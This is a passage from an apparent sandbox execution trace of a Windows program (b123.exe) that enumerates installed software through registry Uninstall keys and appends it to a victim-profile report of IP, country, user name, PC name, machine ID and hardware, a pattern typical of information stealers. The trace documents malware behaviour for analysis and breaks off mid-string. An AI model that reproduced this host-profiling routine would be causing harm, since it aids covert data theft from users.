[0235.122] RegCloseKey (hKey=0x384) returned 0x0 [0235.122] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xe, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.122] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}") returned 90 [0235.122] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.122] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x197fac*=0x3b) returned 0x0 [0235.122] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned 58 [0235.122] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" [0235.122] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="12.0.21005", lpcbData=0x197fac*=0xb) returned 0x0 [0235.122] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 " [0235.122] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005" [0235.122] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n" [0235.122] RegCloseKey (hKey=0x384) returned 0x0 [0235.123] RegEnumKeyExA (in: hKey=0x388, dwIndex=0xf, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.123] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757") returned 100 [0235.123] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.123] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.123] RegCloseKey (hKey=0x384) returned 0x0 [0235.123] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x10, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.123] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173") returned 100 [0235.123] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.123] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.123] RegCloseKey (hKey=0x384) returned 0x0 [0235.123] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x11, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.123] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860") returned 100 [0235.124] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.124] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.124] RegCloseKey (hKey=0x384) returned 0x0 [0235.124] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x12, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.124] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655") returned 100 [0235.124] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.124] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.124] RegCloseKey (hKey=0x384) returned 0x0 [0235.124] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x13, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.124] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743") returned 100 [0235.124] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.124] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.125] RegCloseKey (hKey=0x384) returned 0x0 [0235.125] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x14, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.125] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063") returned 100 [0235.125] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.125] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.125] RegCloseKey (hKey=0x384) returned 0x0 [0235.125] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x15, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.125] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573") returned 99 [0235.125] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.125] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.125] RegCloseKey (hKey=0x384) returned 0x0 [0235.125] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x16, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.126] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}") returned 90 [0235.126] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.126] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x197fac*=0x3c) returned 0x0 [0235.126] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned 59 [0235.126] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\n", lpString2="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508" [0235.126] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="14.25.28508", lpcbData=0x197fac*=0xc) returned 0x0 [0235.126] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain 